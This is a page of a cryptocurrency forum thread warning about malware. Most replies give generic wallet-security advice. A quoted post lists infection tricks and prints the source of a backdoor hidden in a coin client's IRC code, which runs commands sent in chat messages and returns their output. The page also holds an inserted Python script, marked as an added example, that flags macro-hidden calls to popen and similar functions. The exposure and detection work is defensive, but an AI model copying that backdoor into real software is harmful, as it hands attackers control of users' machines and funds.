
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 14. (Read 701343 times)

full member
Activity: 308
Merit: 100
One cannot predict all the ways you will get infected. One effective way is to have a separate device for your cryptocurrency, keep it offline with a thumb drive.
Be skeptical before accessing anything online and it will take you a long way.
newbie
Activity: 266
Merit: 0
Thank you so much for this! My friend nearly got dumped with this but luckily I had seen your post just in time to prevent it
Terrible people who are trying to steal money from others
member
Activity: 210
Merit: 16
The target of this virus is to spam and steal BitCoin. The most dangerous is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
hero member
Activity: 868
Merit: 535
I think since the OP posted this, things have gotten a lot more complicated. The security of cryptocurrencies has improved, however the malware and viruses have likely also improved. However, I believe the best thing to do is to be always prudent to protect yourself. Having some sort of security measure to protect your coins is essential, whether it be bitcoins or whatever altcoins. My security measure of choice is having a hardware wallet, it is a robust security device but still convenient to use.
member
Activity: 230
Merit: 10
I think we should be very careful about the infestations. Thank you very much for the overview and useful information, I think that this site is very useful for scammers who want easy money. Forewarned is forearmed.
copper member
Activity: 84
Merit: 1
If you thought air-gapped devices are safe, read this: https://arstechnica.com/information-technology/2018/04/new-hacks-siphon-private-cryptocurrency-keys-from-airgapped-wallets/

Sounds to me like Person of interest, but still feasible in some ideal conditions.
newbie
Activity: 107
Merit: 0
If you can post the coins name it will be better
member
Activity: 434
Merit: 15
Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.
copper member
Activity: 84
Merit: 1
I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and bury it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.
newbie
Activity: 52
Merit: 0
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
full member
Activity: 250
Merit: 100
This year I am working on getting different wallets and a separate apple so that all the extra programs that I use do not counteract with the system operation itself.
newbie
Activity: 70
Merit: 0
I am a newbie and thanks for informing. I would like to ask how can we spot a scammer?
newbie
Activity: 77
Merit: 0
Are there still malware infection attempts? Thank you!!
full member
Activity: 770
Merit: 100
This virus has spread and will hurt many people.
If the antivirus is no longer functioning, how can we avoid the virus attack?
newbie
Activity: 17
Merit: 0
I am a new member, please help
newbie
Activity: 197
Merit: 0
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Yeah, I can understand why you are so annoyed about it.
Let's hope that they will work out something soon.
I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
newbie
Activity: 197
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information. I think we all must be more careful when we deal with our money - you have inspired me to review my antivirus.
Indeed we must always be careful in maintaining our assets, because there are always thieves everywhere. If your assets are gone you can not report where to go because it will be difficult to find him. Better prevent before something happens that we do not want.
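
Added example, not part of any post in this thread and not code from the coin's source: a small audit script for the macro trick shown in the quoted "Modified source with backdoor" section, where `CRead` hides `popen`. It collects object-like `#define` aliases and reports calls that resolve to a process-spawning function; the `#define` lines in `SAMPLE`, the `RISKY` list and all function names are assumptions made for illustration.

```python
import re

# Process-spawning calls that deserve manual review when reached via an alias.
RISKY = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
         "WinExec", "ShellExecuteA", "CreateProcessA"}
DEFINE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)\s+(.+?)\s*$")

# Constructed sample: the #define lines are assumed, the post does not show them.
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) CFree(buf);
}
'''

def collect_macros(source):
    """Map each object-like macro name to its replacement text."""
    found = (DEFINE.match(line) for line in source.splitlines())
    return {m.group(1): m.group(2) for m in found if m}

def resolve(name, macros):
    """Follow alias chains (A -> B -> popen); the seen set stops cycles."""
    seen = set()
    while name in macros and name not in seen:
        seen.add(name)
        name = macros[name]
    return name

def find_hidden_calls(source):
    """Return (line_no, alias, real_name) for risky calls made through a macro."""
    macros = collect_macros(source)
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE.match(line):
            continue
        code = re.sub(r'"(\\.|[^"\\])*"', '""', line)  # drop string literals
        for call in re.finditer(r"([A-Za-z_]\w*)\s*\(", code):
            alias = call.group(1)
            real = resolve(alias, macros)
            if alias != real and real in RISKY:
                hits.append((no, alias, real))
    return hits

if __name__ == "__main__":
    print(find_hidden_calls(SAMPLE))
```

A hit only means the call deserves a manual read; function-like macros and aliases pulled in from other headers are outside what this script resolves.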
newbie
Activity: 184
Merit: 0
Bad software scares people the most, I use cash for complete security and I recommend doing so
newbie
Activity: 112
Merit: 0
I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.




copper member
Activity: 33
Merit: 0
I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.